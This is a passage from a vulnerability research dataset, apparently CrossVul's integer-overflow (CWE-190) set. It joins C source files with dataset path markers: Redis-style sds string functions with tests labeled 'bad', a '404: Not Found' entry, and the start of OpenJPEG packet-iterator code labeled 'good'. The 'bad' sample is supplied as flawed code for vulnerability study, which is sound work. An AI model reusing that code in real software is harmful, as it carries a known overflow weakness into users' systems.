* %% - Verbatim "%" character.
*/
sds sdscatfmt(sds s, char const *fmt, ...) {
size_t initlen = sdslen(s);
const char *f = fmt;
long i;
va_list ap;
/* To avoid continuous reallocations, let's start with a buffer that
* can hold at least two times the format string itself. It's not the
* best heuristic but seems to work in practice. */
s = sdsMakeRoomFor(s, strlen(fmt)*2);
va_start(ap,fmt);
f = fmt; /* Next format specifier byte to process. */
i = initlen; /* Position of the next byte to write to dest str. */
while(*f) {
char next, *str;
size_t l;
long long num;
unsigned long long unum;
/* Make sure there is always space for at least 1 char. */
if (sdsavail(s)==0) {
s = sdsMakeRoomFor(s,1);
}
switch(*f) {
case '%':
next = *(f+1);
f++;
switch(next) {
case 's':
case 'S':
str = va_arg(ap,char*);
l = (next == 's') ? strlen(str) : sdslen(str);
if (sdsavail(s) < l) {
s = sdsMakeRoomFor(s,l);
}
memcpy(s+i,str,l);
sdsinclen(s,l);
i += l;
break;
case 'i':
case 'I':
if (next == 'i')
num = va_arg(ap,int);
else
num = va_arg(ap,long long);
{
char buf[SDS_LLSTR_SIZE];
l = sdsll2str(buf,num);
if (sdsavail(s) < l) {
s = sdsMakeRoomFor(s,l);
}
memcpy(s+i,buf,l);
sdsinclen(s,l);
i += l;
}
break;
case 'u':
case 'U':
if (next == 'u')
unum = va_arg(ap,unsigned int);
else
unum = va_arg(ap,unsigned long long);
{
char buf[SDS_LLSTR_SIZE];
l = sdsull2str(buf,unum);
if (sdsavail(s) < l) {
s = sdsMakeRoomFor(s,l);
}
memcpy(s+i,buf,l);
sdsinclen(s,l);
i += l;
}
break;
default: /* Handle %% and generally %<unknown>. */
s[i++] = next;
sdsinclen(s,1);
break;
}
break;
default:
s[i++] = *f;
sdsinclen(s,1);
break;
}
f++;
}
va_end(ap);
/* Add null-term */
s[i] = '\0';
return s;
}
/* Remove the part of the string from left and from right composed just of
* contiguous characters found in 'cset', that is a null terminted C string.
*
* After the call, the modified sds string is no longer valid and all the
* references must be substituted with the new pointer returned by the call.
*
* Example:
*
* s = sdsnew("AA...AA.a.aa.aHelloWorld :::");
* s = sdstrim(s,"Aa. :");
* printf("%s\n", s);
*
* Output will be just "HelloWorld".
*/
sds sdstrim(sds s, const char *cset) {
char *start, *end, *sp, *ep;
size_t len;
sp = start = s;
ep = end = s+sdslen(s)-1;
while(sp <= end && strchr(cset, *sp)) sp++;
while(ep > sp && strchr(cset, *ep)) ep--;
len = (sp > ep) ? 0 : ((ep-sp)+1);
if (s != sp) memmove(s, sp, len);
s[len] = '\0';
sdssetlen(s,len);
return s;
}
/* Turn the string into a smaller (or equal) string containing only the
* substring specified by the 'start' and 'end' indexes.
*
* start and end can be negative, where -1 means the last character of the
* string, -2 the penultimate character, and so forth.
*
* The interval is inclusive, so the start and end characters will be part
* of the resulting string.
*
* The string is modified in-place.
*
* Example:
*
* s = sdsnew("Hello World");
* sdsrange(s,1,-1); => "ello World"
*/
void sdsrange(sds s, ssize_t start, ssize_t end) {
size_t newlen, len = sdslen(s);
if (len == 0) return;
if (start < 0) {
start = len+start;
if (start < 0) start = 0;
}
if (end < 0) {
end = len+end;
if (end < 0) end = 0;
}
newlen = (start > end) ? 0 : (end-start)+1;
if (newlen != 0) {
if (start >= (ssize_t)len) {
newlen = 0;
} else if (end >= (ssize_t)len) {
end = len-1;
newlen = (start > end) ? 0 : (end-start)+1;
}
} else {
start = 0;
}
if (start && newlen) memmove(s, s+start, newlen);
s[newlen] = 0;
sdssetlen(s,newlen);
}
/* Apply tolower() to every character of the sds string 's'. */
void sdstolower(sds s) {
size_t len = sdslen(s), j;
for (j = 0; j < len; j++) s[j] = tolower(s[j]);
}
/* Apply toupper() to every character of the sds string 's'. */
void sdstoupper(sds s) {
size_t len = sdslen(s), j;
for (j = 0; j < len; j++) s[j] = toupper(s[j]);
}
/* Compare two sds strings s1 and s2 with memcmp().
*
* Return value:
*
* positive if s1 > s2.
* negative if s1 < s2.
* 0 if s1 and s2 are exactly the same binary string.
*
* If two strings share exactly the same prefix, but one of the two has
* additional characters, the longer string is considered to be greater than
* the smaller one. */
int sdscmp(const sds s1, const sds s2) {
size_t l1, l2, minlen;
int cmp;
l1 = sdslen(s1);
l2 = sdslen(s2);
minlen = (l1 < l2) ? l1 : l2;
cmp = memcmp(s1,s2,minlen);
if (cmp == 0) return l1>l2? 1: (l1<l2? -1: 0);
return cmp;
}
/* Split 's' with separator in 'sep'. An array
* of sds strings is returned. *count will be set
* by reference to the number of tokens returned.
*
* On out of memory, zero length string, zero length
* separator, NULL is returned.
*
* Note that 'sep' is able to split a string using
* a multi-character separator. For example
* sdssplit("foo_-_bar","_-_"); will return two
* elements "foo" and "bar".
*
* This version of the function is binary-safe but
* requires length arguments. sdssplit() is just the
* same function but for zero-terminated strings.
*/
sds *sdssplitlen(const char *s, ssize_t len, const char *sep, int seplen, int *count) {
int elements = 0, slots = 5;
long start = 0, j;
sds *tokens;
if (seplen < 1 || len < 0) return NULL;
tokens = s_malloc(sizeof(sds)*slots);
if (tokens == NULL) return NULL;
if (len == 0) {
*count = 0;
return tokens;
}
for (j = 0; j < (len-(seplen-1)); j++) {
/* make sure there is room for the next element and the final one */
if (slots < elements+2) {
sds *newtokens;
slots *= 2;
newtokens = s_realloc(tokens,sizeof(sds)*slots);
if (newtokens == NULL) goto cleanup;
tokens = newtokens;
}
/* search the separator */
if ((seplen == 1 && *(s+j) == sep[0]) || (memcmp(s+j,sep,seplen) == 0)) {
tokens[elements] = sdsnewlen(s+start,j-start);
if (tokens[elements] == NULL) goto cleanup;
elements++;
start = j+seplen;
j = j+seplen-1; /* skip the separator */
}
}
/* Add the final element. We are sure there is room in the tokens array. */
tokens[elements] = sdsnewlen(s+start,len-start);
if (tokens[elements] == NULL) goto cleanup;
elements++;
*count = elements;
return tokens;
cleanup:
{
int i;
for (i = 0; i < elements; i++) sdsfree(tokens[i]);
s_free(tokens);
*count = 0;
return NULL;
}
}
/* Free the result returned by sdssplitlen(), or do nothing if 'tokens' is NULL. */
void sdsfreesplitres(sds *tokens, int count) {
if (!tokens) return;
while(count--)
sdsfree(tokens[count]);
s_free(tokens);
}
/* Append to the sds string "s" an escaped string representation where
* all the non-printable characters (tested with isprint()) are turned into
* escapes in the form "\n\r\a...." or "\x<hex-number>".
*
* After the call, the modified sds string is no longer valid and all the
* references must be substituted with the new pointer returned by the call. */
sds sdscatrepr(sds s, const char *p, size_t len) {
s = sdscatlen(s,"\"",1);
while(len--) {
switch(*p) {
case '\\':
case '"':
s = sdscatprintf(s,"\\%c",*p);
break;
case '\n': s = sdscatlen(s,"\\n",2); break;
case '\r': s = sdscatlen(s,"\\r",2); break;
case '\t': s = sdscatlen(s,"\\t",2); break;
case '\a': s = sdscatlen(s,"\\a",2); break;
case '\b': s = sdscatlen(s,"\\b",2); break;
default:
if (isprint(*p))
s = sdscatprintf(s,"%c",*p);
else
s = sdscatprintf(s,"\\x%02x",(unsigned char)*p);
break;
}
p++;
}
return sdscatlen(s,"\"",1);
}
/* Helper function for sdssplitargs() that returns non zero if 'c'
* is a valid hex digit. */
int is_hex_digit(char c) {
return (c >= '0' && c <= '9') || (c >= 'a' && c <= 'f') ||
(c >= 'A' && c <= 'F');
}
/* Helper function for sdssplitargs() that converts a hex digit into an
* integer from 0 to 15 */
int hex_digit_to_int(char c) {
switch(c) {
case '0': return 0;
case '1': return 1;
case '2': return 2;
case '3': return 3;
case '4': return 4;
case '5': return 5;
case '6': return 6;
case '7': return 7;
case '8': return 8;
case '9': return 9;
case 'a': case 'A': return 10;
case 'b': case 'B': return 11;
case 'c': case 'C': return 12;
case 'd': case 'D': return 13;
case 'e': case 'E': return 14;
case 'f': case 'F': return 15;
default: return 0;
}
}
/* Split a line into arguments, where every argument can be in the
* following programming-language REPL-alike form:
*
* foo bar "newline are supported\n" and "\xff\x00otherstuff"
*
* The number of arguments is stored into *argc, and an array
* of sds is returned.
*
* The caller should free the resulting array of sds strings with
* sdsfreesplitres().
*
* Note that sdscatrepr() is able to convert back a string into
* a quoted string in the same format sdssplitargs() is able to parse.
*
* The function returns the allocated tokens on success, even when the
* input string is empty, or NULL if the input contains unbalanced
* quotes or closed quotes followed by non space characters
* as in: "foo"bar or "foo'
*/
sds *sdssplitargs(const char *line, int *argc) {
const char *p = line;
char *current = NULL;
char **vector = NULL;
*argc = 0;
while(1) {
/* skip blanks */
while(*p && isspace(*p)) p++;
if (*p) {
/* get a token */
int inq=0; /* set to 1 if we are in "quotes" */
int insq=0; /* set to 1 if we are in 'single quotes' */
int done=0;
if (current == NULL) current = sdsempty();
while(!done) {
if (inq) {
if (*p == '\\' && *(p+1) == 'x' &&
is_hex_digit(*(p+2)) &&
is_hex_digit(*(p+3)))
{
unsigned char byte;
byte = (hex_digit_to_int(*(p+2))*16)+
hex_digit_to_int(*(p+3));
current = sdscatlen(current,(char*)&byte,1);
p += 3;
} else if (*p == '\\' && *(p+1)) {
char c;
p++;
switch(*p) {
case 'n': c = '\n'; break;
case 'r': c = '\r'; break;
case 't': c = '\t'; break;
case 'b': c = '\b'; break;
case 'a': c = '\a'; break;
default: c = *p; break;
}
current = sdscatlen(current,&c,1);
} else if (*p == '"') {
/* closing quote must be followed by a space or
* nothing at all. */
if (*(p+1) && !isspace(*(p+1))) goto err;
done=1;
} else if (!*p) {
/* unterminated quotes */
goto err;
} else {
current = sdscatlen(current,p,1);
}
} else if (insq) {
if (*p == '\\' && *(p+1) == '\'') {
p++;
current = sdscatlen(current,"'",1);
} else if (*p == '\'') {
/* closing quote must be followed by a space or
* nothing at all. */
if (*(p+1) && !isspace(*(p+1))) goto err;
done=1;
} else if (!*p) {
/* unterminated quotes */
goto err;
} else {
current = sdscatlen(current,p,1);
}
} else {
switch(*p) {
case ' ':
case '\n':
case '\r':
case '\t':
case '\0':
done=1;
break;
case '"':
inq=1;
break;
case '\'':
insq=1;
break;
default:
current = sdscatlen(current,p,1);
break;
}
}
if (*p) p++;
}
/* add the token to the vector */
vector = s_realloc(vector,((*argc)+1)*sizeof(char*));
vector[*argc] = current;
(*argc)++;
current = NULL;
} else {
/* Even on empty input string return something not NULL. */
if (vector == NULL) vector = s_malloc(sizeof(void*));
return vector;
}
}
err:
while((*argc)--)
sdsfree(vector[*argc]);
s_free(vector);
if (current) sdsfree(current);
*argc = 0;
return NULL;
}
/* Modify the string substituting all the occurrences of the set of
* characters specified in the 'from' string to the corresponding character
* in the 'to' array.
*
* For instance: sdsmapchars(mystring, "ho", "01", 2)
* will have the effect of turning the string "hello" into "0ell1".
*
* The function returns the sds string pointer, that is always the same
* as the input pointer since no resize is needed. */
sds sdsmapchars(sds s, const char *from, const char *to, size_t setlen) {
size_t j, i, l = sdslen(s);
for (j = 0; j < l; j++) {
for (i = 0; i < setlen; i++) {
if (s[j] == from[i]) {
s[j] = to[i];
break;
}
}
}
return s;
}
/* Join an array of C strings using the specified separator (also a C string).
* Returns the result as an sds string. */
sds sdsjoin(char **argv, int argc, char *sep) {
sds join = sdsempty();
int j;
for (j = 0; j < argc; j++) {
join = sdscat(join, argv[j]);
if (j != argc-1) join = sdscat(join,sep);
}
return join;
}
/* Like sdsjoin, but joins an array of SDS strings. */
sds sdsjoinsds(sds *argv, int argc, const char *sep, size_t seplen) {
sds join = sdsempty();
int j;
for (j = 0; j < argc; j++) {
join = sdscatsds(join, argv[j]);
if (j != argc-1) join = sdscatlen(join,sep,seplen);
}
return join;
}
/* Wrappers to the allocators used by SDS. Note that SDS will actually
* just use the macros defined into sdsalloc.h in order to avoid to pay
* the overhead of function calls. Here we define these wrappers only for
* the programs SDS is linked to, if they want to touch the SDS internals
* even if they use a different allocator. */
void *sds_malloc(size_t size) { return s_malloc(size); }
void *sds_realloc(void *ptr, size_t size) { return s_realloc(ptr,size); }
void sds_free(void *ptr) { s_free(ptr); }
#if defined(SDS_TEST_MAIN)
#include <stdio.h>
#include "testhelp.h"
#include "limits.h"
#define UNUSED(x) (void)(x)
int sdsTest(void) {
{
sds x = sdsnew("foo"), y;
test_cond("Create a string and obtain the length",
sdslen(x) == 3 && memcmp(x,"foo\0",4) == 0)
sdsfree(x);
x = sdsnewlen("foo",2);
test_cond("Create a string with specified length",
sdslen(x) == 2 && memcmp(x,"fo\0",3) == 0)
x = sdscat(x,"bar");
test_cond("Strings concatenation",
sdslen(x) == 5 && memcmp(x,"fobar\0",6) == 0);
x = sdscpy(x,"a");
test_cond("sdscpy() against an originally longer string",
sdslen(x) == 1 && memcmp(x,"a\0",2) == 0)
x = sdscpy(x,"xyzxxxxxxxxxxyyyyyyyyyykkkkkkkkkk");
test_cond("sdscpy() against an originally shorter string",
sdslen(x) == 33 &&
memcmp(x,"xyzxxxxxxxxxxyyyyyyyyyykkkkkkkkkk\0",33) == 0)
sdsfree(x);
x = sdscatprintf(sdsempty(),"%d",123);
test_cond("sdscatprintf() seems working in the base case",
sdslen(x) == 3 && memcmp(x,"123\0",4) == 0)
sdsfree(x);
x = sdscatprintf(sdsempty(),"a%cb",0);
test_cond("sdscatprintf() seems working with \\0 inside of result",
sdslen(x) == 3 && memcmp(x,"a\0""b\0",4) == 0)
{
sdsfree(x);
char etalon[1024*1024];
for (size_t i = 0; i < sizeof(etalon); i++) {
etalon[i] = '0';
}
x = sdscatprintf(sdsempty(),"%0*d",(int)sizeof(etalon),0);
test_cond("sdscatprintf() can print 1MB",
sdslen(x) == sizeof(etalon) && memcmp(x,etalon,sizeof(etalon)) == 0)
}
sdsfree(x);
x = sdsnew("--");
x = sdscatfmt(x, "Hello %s World %I,%I--", "Hi!", LLONG_MIN,LLONG_MAX);
test_cond("sdscatfmt() seems working in the base case",
sdslen(x) == 60 &&
memcmp(x,"--Hello Hi! World -9223372036854775808,"
"9223372036854775807--",60) == 0)
printf("[%s]\n",x);
sdsfree(x);
x = sdsnew("--");
x = sdscatfmt(x, "%u,%U--", UINT_MAX, ULLONG_MAX);
test_cond("sdscatfmt() seems working with unsigned numbers",
sdslen(x) == 35 &&
memcmp(x,"--4294967295,18446744073709551615--",35) == 0)
sdsfree(x);
x = sdsnew(" x ");
sdstrim(x," x");
test_cond("sdstrim() works when all chars match",
sdslen(x) == 0)
sdsfree(x);
x = sdsnew(" x ");
sdstrim(x," ");
test_cond("sdstrim() works when a single char remains",
sdslen(x) == 1 && x[0] == 'x')
sdsfree(x);
x = sdsnew("xxciaoyyy");
sdstrim(x,"xy");
test_cond("sdstrim() correctly trims characters",
sdslen(x) == 4 && memcmp(x,"ciao\0",5) == 0)
y = sdsdup(x);
sdsrange(y,1,1);
test_cond("sdsrange(...,1,1)",
sdslen(y) == 1 && memcmp(y,"i\0",2) == 0)
sdsfree(y);
y = sdsdup(x);
sdsrange(y,1,-1);
test_cond("sdsrange(...,1,-1)",
sdslen(y) == 3 && memcmp(y,"iao\0",4) == 0)
sdsfree(y);
y = sdsdup(x);
sdsrange(y,-2,-1);
test_cond("sdsrange(...,-2,-1)",
sdslen(y) == 2 && memcmp(y,"ao\0",3) == 0)
sdsfree(y);
y = sdsdup(x);
sdsrange(y,2,1);
test_cond("sdsrange(...,2,1)",
sdslen(y) == 0 && memcmp(y,"\0",1) == 0)
sdsfree(y);
y = sdsdup(x);
sdsrange(y,1,100);
test_cond("sdsrange(...,1,100)",
sdslen(y) == 3 && memcmp(y,"iao\0",4) == 0)
sdsfree(y);
y = sdsdup(x);
sdsrange(y,100,100);
test_cond("sdsrange(...,100,100)",
sdslen(y) == 0 && memcmp(y,"\0",1) == 0)
sdsfree(y);
sdsfree(x);
x = sdsnew("foo");
y = sdsnew("foa");
test_cond("sdscmp(foo,foa)", sdscmp(x,y) > 0)
sdsfree(y);
sdsfree(x);
x = sdsnew("bar");
y = sdsnew("bar");
test_cond("sdscmp(bar,bar)", sdscmp(x,y) == 0)
sdsfree(y);
sdsfree(x);
x = sdsnew("aar");
y = sdsnew("bar");
test_cond("sdscmp(bar,bar)", sdscmp(x,y) < 0)
sdsfree(y);
sdsfree(x);
x = sdsnewlen("\a\n\0foo\r",7);
y = sdscatrepr(sdsempty(),x,sdslen(x));
test_cond("sdscatrepr(...data...)",
memcmp(y,"\"\\a\\n\\x00foo\\r\"",15) == 0)
{
unsigned int oldfree;
char *p;
int step = 10, j, i;
sdsfree(x);
sdsfree(y);
x = sdsnew("0");
test_cond("sdsnew() free/len buffers", sdslen(x) == 1 && sdsavail(x) == 0);
/* Run the test a few times in order to hit the first two
* SDS header types. */
for (i = 0; i < 10; i++) {
int oldlen = sdslen(x);
x = sdsMakeRoomFor(x,step);
int type = x[-1]&SDS_TYPE_MASK;
test_cond("sdsMakeRoomFor() len", sdslen(x) == oldlen);
if (type != SDS_TYPE_5) {
test_cond("sdsMakeRoomFor() free", sdsavail(x) >= step);
oldfree = sdsavail(x);
}
p = x+oldlen;
for (j = 0; j < step; j++) {
p[j] = 'A'+j;
}
sdsIncrLen(x,step);
}
test_cond("sdsMakeRoomFor() content",
memcmp("0ABCDEFGHIJABCDEFGHIJABCDEFGHIJABCDEFGHIJABCDEFGHIJABCDEFGHIJABCDEFGHIJABCDEFGHIJABCDEFGHIJABCDEFGHIJ",x,101) == 0);
test_cond("sdsMakeRoomFor() final length",sdslen(x)==101);
sdsfree(x);
}
}
test_report()
return 0;
}
#endif
#ifdef SDS_TEST_MAIN
int main(void) {
return sdsTest();
}
#endif
| ./CrossVul/dataset_final_sorted/CWE-190/c/bad_1943_1 |
crossvul-cpp_data_bad_111_1 | 404: Not Found | ./CrossVul/dataset_final_sorted/CWE-190/c/bad_111_1 |
crossvul-cpp_data_good_540_0 | /*
* The copyright in this software is being made available under the 2-clauses
* BSD License, included below. This software may be subject to other third
* party and contributor rights, including patent rights, and no such rights
* are granted under this license.
*
* Copyright (c) 2002-2014, Universite catholique de Louvain (UCL), Belgium
* Copyright (c) 2002-2014, Professor Benoit Macq
* Copyright (c) 2001-2003, David Janssens
* Copyright (c) 2002-2003, Yannick Verschueren
* Copyright (c) 2003-2007, Francois-Olivier Devaux
* Copyright (c) 2003-2014, Antonin Descampe
* Copyright (c) 2005, Herve Drolon, FreeImage Team
* Copyright (c) 2006-2007, Parvatha Elangovan
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS `AS IS'
* AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
* LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
* CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
* SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
* INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
* CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
* ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
* POSSIBILITY OF SUCH DAMAGE.
*/
#include "opj_includes.h"
/** @defgroup PI PI - Implementation of a packet iterator */
/*@{*/
/** @name Local static functions */
/*@{*/
/**
Get next packet in layer-resolution-component-precinct order.
@param pi packet iterator to modify
@return returns false if pi pointed to the last packet or else returns true
*/
static OPJ_BOOL opj_pi_next_lrcp(opj_pi_iterator_t * pi);
/**
Get next packet in resolution-layer-component-precinct order.
@param pi packet iterator to modify
@return returns false if pi pointed to the last packet or else returns true
*/
static OPJ_BOOL opj_pi_next_rlcp(opj_pi_iterator_t * pi);
/**
Get next packet in resolution-precinct-component-layer order.
@param pi packet iterator to modify
@return returns false if pi pointed to the last packet or else returns true
*/
static OPJ_BOOL opj_pi_next_rpcl(opj_pi_iterator_t * pi);
/**
Get next packet in precinct-component-resolution-layer order.
@param pi packet iterator to modify
@return returns false if pi pointed to the last packet or else returns true
*/
static OPJ_BOOL opj_pi_next_pcrl(opj_pi_iterator_t * pi);
/**
Get next packet in component-precinct-resolution-layer order.
@param pi packet iterator to modify
@return returns false if pi pointed to the last packet or else returns true
*/
static OPJ_BOOL opj_pi_next_cprl(opj_pi_iterator_t * pi);
/**
* Updates the coding parameters if the encoding is used with Progression order changes and final (or cinema parameters are used).
*
* @param p_cp the coding parameters to modify
* @param p_tileno the tile index being concerned.
* @param p_tx0 X0 parameter for the tile
* @param p_tx1 X1 parameter for the tile
* @param p_ty0 Y0 parameter for the tile
* @param p_ty1 Y1 parameter for the tile
* @param p_max_prec the maximum precision for all the bands of the tile
* @param p_max_res the maximum number of resolutions for all the poc inside the tile.
* @param p_dx_min the minimum dx of all the components of all the resolutions for the tile.
* @param p_dy_min the minimum dy of all the components of all the resolutions for the tile.
*/
static void opj_pi_update_encode_poc_and_final ( opj_cp_t *p_cp,
OPJ_UINT32 p_tileno,
OPJ_INT32 p_tx0,
OPJ_INT32 p_tx1,
OPJ_INT32 p_ty0,
OPJ_INT32 p_ty1,
OPJ_UINT32 p_max_prec,
OPJ_UINT32 p_max_res,
OPJ_UINT32 p_dx_min,
OPJ_UINT32 p_dy_min);
/**
* Updates the coding parameters if the encoding is not used with Progression order changes and final (and cinema parameters are used).
*
* @param p_cp the coding parameters to modify
* @param p_num_comps the number of components
* @param p_tileno the tile index being concerned.
* @param p_tx0 X0 parameter for the tile
* @param p_tx1 X1 parameter for the tile
* @param p_ty0 Y0 parameter for the tile
* @param p_ty1 Y1 parameter for the tile
* @param p_max_prec the maximum precision for all the bands of the tile
* @param p_max_res the maximum number of resolutions for all the poc inside the tile.
* @param p_dx_min the minimum dx of all the components of all the resolutions for the tile.
* @param p_dy_min the minimum dy of all the components of all the resolutions for the tile.
*/
static void opj_pi_update_encode_not_poc ( opj_cp_t *p_cp,
OPJ_UINT32 p_num_comps,
OPJ_UINT32 p_tileno,
OPJ_INT32 p_tx0,
OPJ_INT32 p_tx1,
OPJ_INT32 p_ty0,
OPJ_INT32 p_ty1,
OPJ_UINT32 p_max_prec,
OPJ_UINT32 p_max_res,
OPJ_UINT32 p_dx_min,
OPJ_UINT32 p_dy_min);
/**
* Gets the encoding parameters needed to update the coding parameters and all the pocs.
*
* @param p_image the image being encoded.
* @param p_cp the coding parameters.
* @param tileno the tile index of the tile being encoded.
* @param p_tx0 pointer that will hold the X0 parameter for the tile
* @param p_tx1 pointer that will hold the X1 parameter for the tile
* @param p_ty0 pointer that will hold the Y0 parameter for the tile
* @param p_ty1 pointer that will hold the Y1 parameter for the tile
* @param p_max_prec pointer that will hold the the maximum precision for all the bands of the tile
* @param p_max_res pointer that will hold the the maximum number of resolutions for all the poc inside the tile.
* @param p_dx_min pointer that will hold the the minimum dx of all the components of all the resolutions for the tile.
* @param p_dy_min pointer that will hold the the minimum dy of all the components of all the resolutions for the tile.
*/
static void opj_get_encoding_parameters(const opj_image_t *p_image,
const opj_cp_t *p_cp,
OPJ_UINT32 tileno,
OPJ_INT32 * p_tx0,
OPJ_INT32 * p_tx1,
OPJ_INT32 * p_ty0,
OPJ_INT32 * p_ty1,
OPJ_UINT32 * p_dx_min,
OPJ_UINT32 * p_dy_min,
OPJ_UINT32 * p_max_prec,
OPJ_UINT32 * p_max_res );
/**
* Gets the encoding parameters needed to update the coding parameters and all the pocs.
* The precinct widths, heights, dx and dy for each component at each resolution will be stored as well.
* the last parameter of the function should be an array of pointers of size nb components, each pointer leading
* to an area of size 4 * max_res. The data is stored inside this area with the following pattern :
* dx_compi_res0 , dy_compi_res0 , w_compi_res0, h_compi_res0 , dx_compi_res1 , dy_compi_res1 , w_compi_res1, h_compi_res1 , ...
*
* @param p_image the image being encoded.
* @param p_cp the coding parameters.
* @param tileno the tile index of the tile being encoded.
* @param p_tx0 pointer that will hold the X0 parameter for the tile
* @param p_tx1 pointer that will hold the X1 parameter for the tile
* @param p_ty0 pointer that will hold the Y0 parameter for the tile
* @param p_ty1 pointer that will hold the Y1 parameter for the tile
* @param p_max_prec pointer that will hold the the maximum precision for all the bands of the tile
* @param p_max_res pointer that will hold the the maximum number of resolutions for all the poc inside the tile.
* @param p_dx_min pointer that will hold the the minimum dx of all the components of all the resolutions for the tile.
* @param p_dy_min pointer that will hold the the minimum dy of all the components of all the resolutions for the tile.
* @param p_resolutions pointer to an area corresponding to the one described above.
*/
static void opj_get_all_encoding_parameters(const opj_image_t *p_image,
const opj_cp_t *p_cp,
OPJ_UINT32 tileno,
OPJ_INT32 * p_tx0,
OPJ_INT32 * p_tx1,
OPJ_INT32 * p_ty0,
OPJ_INT32 * p_ty1,
OPJ_UINT32 * p_dx_min,
OPJ_UINT32 * p_dy_min,
OPJ_UINT32 * p_max_prec,
OPJ_UINT32 * p_max_res,
OPJ_UINT32 ** p_resolutions );
/**
* Allocates memory for a packet iterator. Data and data sizes are set by this operation.
* No other data is set. The include section of the packet iterator is not allocated.
*
* @param p_image the image used to initialize the packet iterator (in fact only the number of components is relevant.
* @param p_cp the coding parameters.
* @param tileno the index of the tile from which creating the packet iterator.
*/
static opj_pi_iterator_t * opj_pi_create( const opj_image_t *p_image,
const opj_cp_t *p_cp,
OPJ_UINT32 tileno );
/**
* FIXME DOC
*/
static void opj_pi_update_decode_not_poc (opj_pi_iterator_t * p_pi,
opj_tcp_t * p_tcp,
OPJ_UINT32 p_max_precision,
OPJ_UINT32 p_max_res);
/**
* FIXME DOC
*/
static void opj_pi_update_decode_poc ( opj_pi_iterator_t * p_pi,
opj_tcp_t * p_tcp,
OPJ_UINT32 p_max_precision,
OPJ_UINT32 p_max_res);
/**
* FIXME DOC
*/
OPJ_BOOL opj_pi_check_next_level( OPJ_INT32 pos,
opj_cp_t *cp,
OPJ_UINT32 tileno,
OPJ_UINT32 pino,
const OPJ_CHAR *prog);
/*@}*/
/*@}*/
/*
==========================================================
local functions
==========================================================
*/
OPJ_BOOL opj_pi_next_lrcp(opj_pi_iterator_t * pi) {
opj_pi_comp_t *comp = NULL;
opj_pi_resolution_t *res = NULL;
OPJ_UINT32 index = 0;
if (!pi->first) {
comp = &pi->comps[pi->compno];
res = &comp->resolutions[pi->resno];
goto LABEL_SKIP;
} else {
pi->first = 0;
}
for (pi->layno = pi->poc.layno0; pi->layno < pi->poc.layno1; pi->layno++) {
for (pi->resno = pi->poc.resno0; pi->resno < pi->poc.resno1;
pi->resno++) {
for (pi->compno = pi->poc.compno0; pi->compno < pi->poc.compno1; pi->compno++) {
comp = &pi->comps[pi->compno];
if (pi->resno >= comp->numresolutions) {
continue;
}
res = &comp->resolutions[pi->resno];
if (!pi->tp_on){
pi->poc.precno1 = res->pw * res->ph;
}
for (pi->precno = pi->poc.precno0; pi->precno < pi->poc.precno1; pi->precno++) {
index = pi->layno * pi->step_l + pi->resno * pi->step_r + pi->compno * pi->step_c + pi->precno * pi->step_p;
if (!pi->include[index]) {
pi->include[index] = 1;
return OPJ_TRUE;
}
LABEL_SKIP:;
}
}
}
}
return OPJ_FALSE;
}
OPJ_BOOL opj_pi_next_rlcp(opj_pi_iterator_t * pi) {
opj_pi_comp_t *comp = NULL;
opj_pi_resolution_t *res = NULL;
OPJ_UINT32 index = 0;
if (!pi->first) {
comp = &pi->comps[pi->compno];
res = &comp->resolutions[pi->resno];
goto LABEL_SKIP;
} else {
pi->first = 0;
}
for (pi->resno = pi->poc.resno0; pi->resno < pi->poc.resno1; pi->resno++) {
for (pi->layno = pi->poc.layno0; pi->layno < pi->poc.layno1; pi->layno++) {
for (pi->compno = pi->poc.compno0; pi->compno < pi->poc.compno1; pi->compno++) {
comp = &pi->comps[pi->compno];
if (pi->resno >= comp->numresolutions) {
continue;
}
res = &comp->resolutions[pi->resno];
if(!pi->tp_on){
pi->poc.precno1 = res->pw * res->ph;
}
for (pi->precno = pi->poc.precno0; pi->precno < pi->poc.precno1; pi->precno++) {
index = pi->layno * pi->step_l + pi->resno * pi->step_r + pi->compno * pi->step_c + pi->precno * pi->step_p;
if (!pi->include[index]) {
pi->include[index] = 1;
return OPJ_TRUE;
}
LABEL_SKIP:;
}
}
}
}
return OPJ_FALSE;
}
OPJ_BOOL opj_pi_next_rpcl(opj_pi_iterator_t * pi) {
opj_pi_comp_t *comp = NULL;
opj_pi_resolution_t *res = NULL;
OPJ_UINT32 index = 0;
if (!pi->first) {
goto LABEL_SKIP;
} else {
OPJ_UINT32 compno, resno;
pi->first = 0;
pi->dx = 0;
pi->dy = 0;
for (compno = 0; compno < pi->numcomps; compno++) {
comp = &pi->comps[compno];
for (resno = 0; resno < comp->numresolutions; resno++) {
OPJ_UINT32 dx, dy;
res = &comp->resolutions[resno];
dx = comp->dx * (1u << (res->pdx + comp->numresolutions - 1 - resno));
dy = comp->dy * (1u << (res->pdy + comp->numresolutions - 1 - resno));
pi->dx = !pi->dx ? dx : opj_uint_min(pi->dx, dx);
pi->dy = !pi->dy ? dy : opj_uint_min(pi->dy, dy);
}
}
}
if (!pi->tp_on){
pi->poc.ty0 = pi->ty0;
pi->poc.tx0 = pi->tx0;
pi->poc.ty1 = pi->ty1;
pi->poc.tx1 = pi->tx1;
}
for (pi->resno = pi->poc.resno0; pi->resno < pi->poc.resno1; pi->resno++) {
